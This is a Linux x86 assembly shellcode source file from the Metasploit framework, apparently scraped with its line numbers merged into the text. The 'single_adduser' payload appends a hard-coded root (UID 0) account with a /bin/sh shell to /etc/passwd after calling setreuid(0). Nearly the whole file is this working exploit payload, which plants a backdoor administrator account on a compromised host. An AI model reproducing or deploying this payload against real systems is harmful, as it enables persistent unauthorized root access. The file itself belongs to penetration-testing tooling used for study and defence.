Path: blob/master/external/source/shellcode/linux/ia32/single_adduser.asm
19778 views
;;1;2; Name: single_adduser3; Authors: vlad902 <vlad902 [at] gmail.com>4; Authors: spoonm <ninjatools [at] hush.com>5; Authors: skape <mmiller [at] hick.org>6; Version: $Revision: 1513 $7; License:8;9; This file is part of the Metasploit Exploit Framework10; and is subject to the same licenses and copyrights as11; the rest of this package.12;13; Description:14;15; Add a line to /etc/passwd.16;17; Meta-Information:18;19; meta-shortname=Linux adduser20; meta-description=Create an entry in /etc/passwd with UID=021; meta-authors=vlad902 <vlad902 [at] gmail.com>, spoonm <ninjatools [at] hush.com>, skape <mmiller [at] hick.org>22; meta-os=linux23; meta-arch=ia3224; meta-category=single25; meta-name=adduser26; meta-basemod=Msf::PayloadComponent::NoConnection27; Offset for inserting the string:28; meta-custom1=0x2729; Offset after string:30; meta-custom2=0x4b31;;323334BITS 3235global _start3637%include "generic.asm"3839_start:40setreuid 04142push byte 0x0543pop eax4445xor ecx, ecx46push ecx47push dword 0x6477737348push dword 0x61702f2f49push dword 0x6374652f50mov ebx, esp51inc ecx52mov ch, 0x0453int 0x805455xchg eax, ebx56call getstr57db "ABC:AAnV3m35vbc/g:0:0::/:/bin/sh"58getstr:59pop ecx60mov edx, [ecx-4]61push byte 0x0462pop eax63int 0x806465push byte 0x0166pop eax67int 0x80686970